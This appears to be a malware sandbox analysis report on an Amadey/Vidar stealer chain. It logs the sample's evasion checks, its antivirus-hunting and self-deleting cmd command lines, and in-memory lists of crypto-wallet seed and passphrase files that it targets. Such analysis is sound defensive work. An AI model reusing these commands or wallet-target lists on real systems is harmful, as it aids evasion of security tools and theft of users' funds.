Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1440	Thread sleep time: -2005002s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7240	Thread sleep count: 347 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7240	Thread sleep time: -10410000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6024	Thread sleep count: 1654 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6024	Thread sleep time: -3309654s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7072	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3448	Thread sleep count: 993 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3448	Thread sleep time: -1986993s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3084	Thread sleep count: 1019 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3084	Thread sleep time: -2039019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2000	Thread sleep count: 1007 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2000	Thread sleep time: -2015007s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5772	Thread sleep count: 792 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5772	Thread sleep time: -1584792s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_00405B98 FindFirstFileW,FindClose,	8_2_00405B98
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406559
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_004029F1 FindFirstFileW,	8_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00264005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00264005
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026494A GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0026494A
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0026C2FF
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026CD14 FindFirstFileW,FindClose,	18_2_0026CD14
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	18_2_0026CD9F
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0026F5D8
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0026F735
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0026FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0026FA36
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00263CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00263CE2

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00215D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

18_2_00215D13

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\419591\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\419591	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: axplong.exe, axplong.exe, 00000002.00000002.1728789980.0000000000235000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000002.00000001.1682137593.0000000000235000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Predicted.pif, 00000012.00000002.4066348704.0000000001815000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1698282666.00000000002E5000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1725584731.0000000000235000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000002.00000002.1728789980.0000000000235000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000002.00000001.1682137593.0000000000235000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	API call chain: ExitProcess graph end node			graph_18-98003
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	API call chain: ExitProcess graph end node			graph_18-98482

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04AF079D rdtsc

0_2_04AF079D

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_002745D5 BlockInput,

18_2_002745D5

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00215240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_00215240

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00235CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

18_2_00235CAC

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe

Code function: 8_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,

8_2_00405BBF

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_002588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

18_2_002588CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022A354 SetUnhandledExceptionFilter,		18_2_0022A354
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		18_2_0022A385

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Predicted.pif PID: 7684, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00259369 LogonUserW,

18_2_00259369

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00215240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_00215240

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00261AC6 SendInput,keybd_event,

18_2_00261AC6

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_002651E2 mouse_event,

18_2_002651E2

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe "C:\Users\user\AppData\Local\Temp\1000156001\seo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 419591	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAVEDBEDFLESHPROVIDED" Waves	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif Predicted.pif J	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\EBGCFBGCBFHJ" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

18_2_002588CD

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00264F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

18_2_00264F1C

Source: Predicted.pif, 00000012.00000000.2370745326.00000000002B6000.00000002.00000001.01000000.0000000B.sdmp, Predicted.pif.9.dr, Determined.8.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Predicted.pif	Binary or memory string: Shell_TrayWnd
Source: axplong.exe, axplong.exe, 00000002.00000002.1728789980.0000000000235000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: :Program Manager

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_0022885B cpuid

18_2_0022885B

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00240030 GetLocalTime,__swprintf,

18_2_00240030

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00240722 GetUserNameW,

18_2_00240722

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_0023416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

18_2_0023416A

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe

Code function: 8_2_00405C70 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,

8_2_00405C70

Source: Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.axplong.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1658017115.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1685161264.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1688423939.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1698207716.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1725519016.0000000000041000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2311850490.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1728683061.0000000000041000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 18.2.Predicted.pif.49a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.1bac610.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.17e8428.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.1bac610.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Predicted.pif.17e8428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Predicted.pif PID: 7684, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Predicted.pif, 00000012.00000002.4065342792.00000000013CD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: lets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
